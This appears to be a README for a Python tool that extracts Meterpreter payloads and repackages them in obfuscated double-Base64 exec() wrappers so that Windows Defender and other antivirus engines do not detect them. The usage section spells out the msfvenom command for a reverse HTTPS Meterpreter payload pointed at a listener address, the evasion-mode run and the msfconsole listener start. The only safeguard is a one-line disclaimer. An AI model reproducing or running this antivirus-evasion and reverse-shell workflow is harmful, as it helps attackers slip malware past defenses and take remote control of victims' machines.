A Python utility designed to extract, deobfuscate, and repackage Meterpreter payloads. This tool identifies encoded blobs (Zlib, Base64, or Hex) within a script, extracts the original source, and allows for the generation of a fresh, obfuscated wrapper to evade static analysis by Windows Defender and other AV engines.
- Recursive Decoding: Unpacks nested Base64, Zlib, and Hex layers automatically.
- Evasion Mode
-m evsaion: Wraps raw code in a Double Base64 insideexec()to mask signatures. - Clean Mode
-m clean: Extracts raw source for analysis.
Clone the repository:
git clone https://github.com/Pwn3rx0/Py-Evasion.git
cd Py-EvasionNo external dependencies are required (uses standard Python libraries).
msfvenom -p python/meterpreter_reverse_https lhost=192.168.1.6 lport=4444 -o payload.py
python3 PyEvasion.py -i payload.py -o evade.py -m evasion
msfconsole -r listener.rcFor educational and authorized security testing only. Misuse is illegal.